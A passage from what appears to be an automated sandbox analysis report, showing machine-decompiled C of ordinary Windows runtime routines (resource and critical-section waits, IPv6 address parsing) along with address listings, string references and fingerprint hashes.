				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00b701c0;
									_push(_t92);
									_push(0);
									_t37 = E00A8F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00AD4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00AE3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00AE3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00B1217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00AE3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00AD3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00AB5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E00A8F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00AD3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E00A8F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00AD3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E00A8F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00AD3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E00AB5329(_t74, _t92);
													_push(1);
													return E00AB53A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                                                              0x00ab53ab
                                                              0x00ab53ae
                                                              0x00ab53b1
                                                              0x00ab53b4
                                                              0x00ab53b7
                                                              0x00ad05b6
                                                              0x00ad05c0
                                                              0x00ad05c3
                                                              0x00000000
                                                              0x00ad05c9
                                                              0x00ad05c9
                                                              0x00ad05cc
                                                              0x00ad05d5
                                                              0x00ad05d5
                                                              0x00ab53bd
                                                              0x00ab53bd
                                                              0x00ab53bd
                                                              0x00ab53be
                                                              0x00ab53be
                                                              0x00ab53be
                                                              0x00ab53c0
                                                              0x00000000
                                                              0x00000000
                                                              0x00af2269
                                                              0x00af226d
                                                              0x00af2349
                                                              0x00af234d
                                                              0x00af2273
                                                              0x00af2276
                                                              0x00af2279
                                                              0x00af227e
                                                              0x00af2283
                                                              0x00af2287
                                                              0x00af228a
                                                              0x00af228d
                                                              0x00af228f
                                                              0x00af22bc
                                                              0x00af22bc
                                                              0x00af22bc
                                                              0x00af22be
                                                              0x00af22c4
                                                              0x00af22cc
                                                              0x00af22d0
                                                              0x00af22d6
                                                              0x00af22d7
                                                              0x00af22da
                                                              0x00af22df
                                                              0x00af22e4
                                                              0x00000000
                                                              0x00000000
                                                              0x00af22e6
                                                              0x00af22e9
                                                              0x00af22f4
                                                              0x00af22f9
                                                              0x00af22fa
                                                              0x00af2305
                                                              0x00af2314
                                                              0x00af2319
                                                              0x00af231a
                                                              0x00af231d
                                                              0x00af2320
                                                              0x00af2323
                                                              0x00af2323
                                                              0x00af2328
                                                              0x00af232d
                                                              0x00af232f
                                                              0x00af2331
                                                              0x00af2336
                                                              0x00af2336
                                                              0x00af233b
                                                              0x00af233d
                                                              0x00af2350
                                                              0x00af2351
                                                              0x00af2356
                                                              0x00af2359
                                                              0x00af2359
                                                              0x00af235b
                                                              0x00af235d
                                                              0x00ab5367
                                                              0x00ab536b
                                                              0x00ab5372
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00af2363
                                                              0x00af2363
                                                              0x00af2369
                                                              0x00af236a
                                                              0x00af236c
                                                              0x00af2371
                                                              0x00af2373
                                                              0x00000000
                                                              0x00af2379
                                                              0x00af2379
                                                              0x00af237a
                                                              0x00af237f
                                                              0x00af237f
                                                              0x00af2385
                                                              0x00af2386
                                                              0x00af2389
                                                              0x00af238e
                                                              0x00af2390
                                                              0x00ab5378
                                                              0x00ab537c
                                                              0x00af2396
                                                              0x00af2396
                                                              0x00af2397
                                                              0x00af239c
                                                              0x00af23a2
                                                              0x00af23a3
                                                              0x00af23a6
                                                              0x00af23ab
                                                              0x00af23ad
                                                              0x00000000
                                                              0x00af23b3
                                                              0x00af23b3
                                                              0x00af23b4
                                                              0x00af23b9
                                                              0x00af23ba
                                                              0x00af23ba
                                                              0x00af23bc
                                                              0x00af23bf
                                                              0x00000000
                                                              0x00000000
                                                              0x00ae9153
                                                              0x00ae9158
                                                              0x00ae915a
                                                              0x00ae915e
                                                              0x00ae9160
                                                              0x00000000
                                                              0x00ae9166
                                                              0x00ae9166
                                                              0x00ae9171
                                                              0x00ae9176
                                                              0x00ae9176
                                                              0x00000000
                                                              0x00ae9160
                                                              0x00af23c6
                                                              0x00af23cb
                                                              0x00af23d7
                                                              0x00af23d7
                                                              0x00af23ad
                                                              0x00af2390
                                                              0x00af2373
                                                              0x00af233f
                                                              0x00af233f
                                                              0x00000000
                                                              0x00af233f
                                                              0x00af2291
                                                              0x00af2291
                                                              0x00af2293
                                                              0x00af2295
                                                              0x00af229a
                                                              0x00af22a1
                                                              0x00af22a3
                                                              0x00af22a7
                                                              0x00af22a9
                                                              0x00000000
                                                              0x00000000
                                                              0x00af22ab
                                                              0x00af22ad
                                                              0x00af22af
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00af22af
                                                              0x00af22b1
                                                              0x00af22b4
                                                              0x00af22b4
                                                              0x00af22b6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00af22b6
                                                              0x00af228f
                                                              0x00000000
                                                              0x00af226d
                                                              0x00ab53cb
                                                              0x00ab53ce
                                                              0x00ab53d0
                                                              0x00ab53d4
                                                              0x00ab53d6
                                                              0x00000000
                                                              0x00ab53d8
                                                              0x00ab53e3
                                                              0x00ab53ea
                                                              0x00ab53ea
                                                              0x00ab53d6
                                                              0x00000000

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AF22F4
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 00AF2328
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AF22FC
                                                              • RTL: Resource at %p, xrefs: 00AF230B
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-871070163
                                                              • Opcode ID: b0b9cd6cc165c2ee08e8a49b7af78c61d54ec469860afd4f9771e73e4251eee3
                                                              • Instruction ID: 1c64a6399c67a7217dba766b7077c61cc6a21142cb9af6a39e831fdd07d6d841
                                                              • Opcode Fuzzy Hash: b0b9cd6cc165c2ee08e8a49b7af78c61d54ec469860afd4f9771e73e4251eee3
                                                              • Instruction Fuzzy Hash: EB51F6726006056BDF119B79CD91FE673ECAF58364F104229FE19DF282EA61ED418790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00ABEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 51%
                                                              			E00ABEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E00AADA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xb7793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E00A916C0(_t39);
				} else {
					_t40 = E00A8F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00AD3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E00A901A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xb7793c; // 0x0
								_push(_t85);
								_t44 = E00A91F28(_t71);
							} else {
								_t44 = E00A8F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00AD3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00B12306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E00ABEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00AD4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00AE3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00AE3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xb720c0;
								if(_t85 != 0xb720c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E00B1217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00AE3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                              0x00abec56
                                                              0x00abec56
                                                              0x00abec56
                                                              0x00abec5c
                                                              0x00abec64
                                                              0x00af23e6
                                                              0x00af23eb
                                                              0x00af23eb
                                                              0x00abec6a
                                                              0x00abec6c
                                                              0x00abec6f
                                                              0x00af23f3
                                                              0x00af23f8
                                                              0x00af23fa
                                                              0x00af23fc
                                                              0x00abec75
                                                              0x00abec76
                                                              0x00abec76
                                                              0x00abec7b
                                                              0x00abec7c
                                                              0x00abec7e
                                                              0x00af2406
                                                              0x00af2407
                                                              0x00af240c
                                                              0x00af240d
                                                              0x00af240d
                                                              0x00af240d
                                                              0x00af2414
                                                              0x00af2417
                                                              0x00af241e
                                                              0x00af2435
                                                              0x00af2438
                                                              0x00af243c
                                                              0x00af243f
                                                              0x00af2442
                                                              0x00af2443
                                                              0x00af2446
                                                              0x00af2449
                                                              0x00af2453
                                                              0x00af2455
                                                              0x00af245b
                                                              0x00af245b
                                                              0x00abeb99
                                                              0x00abeb99
                                                              0x00abeb9c
                                                              0x00abeb9d
                                                              0x00abeb9f
                                                              0x00abeba2
                                                              0x00af2465
                                                              0x00af246b
                                                              0x00af246d
                                                              0x00abeba8
                                                              0x00abeba9
                                                              0x00abeba9
                                                              0x00abebae
                                                              0x00abebb3
                                                              0x00abebb9
                                                              0x00abebbb
                                                              0x00af2513
                                                              0x00af2514
                                                              0x00af2519
                                                              0x00af251b
                                                              0x00abec2a
                                                              0x00abec2d
                                                              0x00abec33
                                                              0x00abec36
                                                              0x00abec3a
                                                              0x00abec3e
                                                              0x00abec40
                                                              0x00abec47
                                                              0x00abec47
                                                              0x00abec40
                                                              0x00a922c6
                                                              0x00abebc1
                                                              0x00abebc1
                                                              0x00abebc5
                                                              0x00abec9a
                                                              0x00abec9a
                                                              0x00abebd6
                                                              0x00abebd6
                                                              0x00000000
                                                              0x00abebbb
                                                              0x00af2477
                                                              0x00af247c
                                                              0x00af2486
                                                              0x00af248b
                                                              0x00af2496
                                                              0x00af249b
                                                              0x00af249d
                                                              0x00af24a0
                                                              0x00af24a3
                                                              0x00af24aa
                                                              0x00af24aa
                                                              0x00af24a5
                                                              0x00af24a5
                                                              0x00af24a5
                                                              0x00af24ac
                                                              0x00af24af
                                                              0x00af24b0
                                                              0x00af24b3
                                                              0x00af24b9
                                                              0x00af24ba
                                                              0x00af24bb
                                                              0x00af24c6
                                                              0x00af24cb
                                                              0x00af24cd
                                                              0x00af24d0
                                                              0x00af24d1
                                                              0x00af24d4
                                                              0x00af24d6
                                                              0x00af24d9
                                                              0x00af24d9
                                                              0x00af24dc
                                                              0x00af24df
                                                              0x00af24e1
                                                              0x00af24e7
                                                              0x00af24e9
                                                              0x00af24ec
                                                              0x00af24ef
                                                              0x00af24f2
                                                              0x00af24f2
                                                              0x00af24ef
                                                              0x00af24e7
                                                              0x00af24fa
                                                              0x00af24ff
                                                              0x00af2501
                                                              0x00af2503
                                                              0x00af2506
                                                              0x00af250b
                                                              0x00abeb8c
                                                              0x00abeb93
                                                              0x00000000
                                                              0x00000000
                                                              0x00abeb93
                                                              0x00000000
                                                              0x00abeb99
                                                              0x00abec85
                                                              0x00abec85
                                                              0x00abec85
                                                              0x00000000

                                                              Strings
                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00AF248D
                                                              • RTL: Re-Waiting, xrefs: 00AF24FA
                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00AF24BD
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2344141769.0000000000A80000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000007.00000002.2344136748.0000000000A70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344242690.0000000000B60000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344249896.0000000000B70000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344257705.0000000000B74000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344263581.0000000000B77000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344275659.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000007.00000002.2344323111.0000000000BE0000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                              • API String ID: 0-3177188983
                                                              • Opcode ID: 27fba4ae548a037b73e865cb819be9cde5506b0eea98ab5c864d63e242ad458b
                                                              • Instruction ID: 0545e49a600cd9bb50c92c43cec56351fcd6989edde003c6456845726e4102a9
                                                              • Opcode Fuzzy Hash: 27fba4ae548a037b73e865cb819be9cde5506b0eea98ab5c864d63e242ad458b
                                                              • Instruction Fuzzy Hash: DE41D771600204AFCB20DFA8CD85FAA77B8EF45720F208615F6599B2C2D774E9418761
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00ACFCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00ACFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E00ACEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E00ACEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E00AC685D(_t167, 4) == 0) {
								if(E00AC685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E00AC685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E00AC685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00AA8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E00A9DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E00ACEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E00ACEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                              0x00acfcd1
                                                              0x00acfcd6
                                                              0x00acfcd9
                                                              0x00acfcdc
                                                              0x00acfcdf
                                                              0x00acfce2
                                                              0x00acfce5
                                                              0x00acfce8
                                                              0x00acfceb
                                                              0x00acfced
                                                              0x00acfced
                                                              0x00acfcf3
                                                              0x00000000
                                                              0x00000000
                                                              0x00acfcfc
                                                              0x00acfcfe
                                                              0x00acfdc1
                                                              0x00afecbd
                                                              0x00000000
                                                              0x00afeccc
                                                              0x00afeccc
                                                              0x00afecd2
                                                              0x00000000
                                                              0x00000000
                                                              0x00afecdf
                                                              0x00afece0
                                                              0x00afece4
                                                              0x00afeceb
                                                              0x00afecee
                                                              0x00afeca8
                                                              0x00afeca8
                                                              0x00afecaa
                                                              0x00acfd76
                                                              0x00acfd79
                                                              0x00acfdb4
                                                              0x00acfdb5
                                                              0x00acfdb6
                                                              0x00000000
                                                              0x00acfdb6
                                                              0x00acfd7e
                                                              0x00afecfc
                                                              0x00acfe2f
                                                              0x00000000
                                                              0x00acfe2f
                                                              0x00afed08
                                                              0x00afed0f
                                                              0x00afed17
                                                              0x00afed1b
                                                              0x00000000
                                                              0x00afed1b
                                                              0x00acfd88
                                                              0x00000000
                                                              0x00000000
                                                              0x00acfd94
                                                              0x00acfd99
                                                              0x00acfda1
                                                              0x00000000
                                                              0x00000000
                                                              0x00acfdb0
                                                              0x00000000
                                                              0x00acfdb0
                                                              0x00afecbd
                                                              0x00acfdc7
                                                              0x00acfdcb
                                                              0x00000000
                                                              0x00acfdd7
                                                              0x00acfde3
                                                              0x00acfe06
                                                              0x00ae1fe7
                                                              0x00000000
                                                              0x00000000
                                                              0x00ae1fef
                                                              0x00ae1ff0
                                                              0x00ae1ff4
                                                              0x00ae1ff7
                                                              0x00ae1ffa
                                                              0x00ae1ffd
                                                              0x00ae2000
                                                              0x00000000
                                                              0x00000000
                                                              0x00afecf1
                                                              0x00000000
                                                              0x00afecf1
                                                              0x00000000
                                                              0x00acfe06
                                                              0x00acfde8
                                                              0x00acfdec
                                                              0x00acfdef
                                                              0x00acfdf2
                                                              0x00000000
                                                              0x00acfdf2
                                                              0x00acfdcb
                                                              0x00acfd04
                                                              0x00acfd05
                                                              0x00afec67
                                                              0x00000000
                                                              0x00000000
                                                              0x00afec6f
                                                              0x00000000
                                                              0x00afec6f
                                                              0x00acfd13
                                                              0x00acfd3c
                                                              0x00acfd40
                                                              0x00afec75
                                                              0x00afec7a
                                                              0x00000000
                                                              0x00afec8a
                                                              0x00afec8a
                                                              0x00afec90
                                                              0x00afecb2
                                                              0x00acfd73
                                                              0x00acfd73
                                                              0x00000000
                                                              0x00acfd73
                                                              0x00afec95
                                                              0x00000000
                                                              0x00000000
                                                              0x00afeca1
                                                              0x00afeca4
                                                              0x00afeca5
                                                              0x00000000
                                                              0x00afeca5
                                                              0x00afec7a
                                                              0x00acfd4a
                                                              0x00000000
                                                              0x00acfd6e
                                                              0x00acfd6e
                                                              0x00acfd71
                                                              0x00000000
                                                              0x00acfd71
                                                              0x00acfd4a
                                                              0x00acfd21
                                                              0x00ada3a1
                                                              0x00000000
                                                              0x00ada3a1
                                                              0x00acfd36
                                                              0x00ae200b
                                                              0x00ae2012
                                                              0x00000000
                                                              0x00000000
                                                              0x00ae2018
                                                              0x00000000
                                                              0x00ae2018
                                                              0x00000000
                                                              0x00acfd36
                                                              0x00acfe0f
                                                              0x00acfe16
                                                              0x00ada3ad
                                                              0x00000000
                                                              0x00000000
                                                              0x00ada3b3
                                                              0x00ada3b3
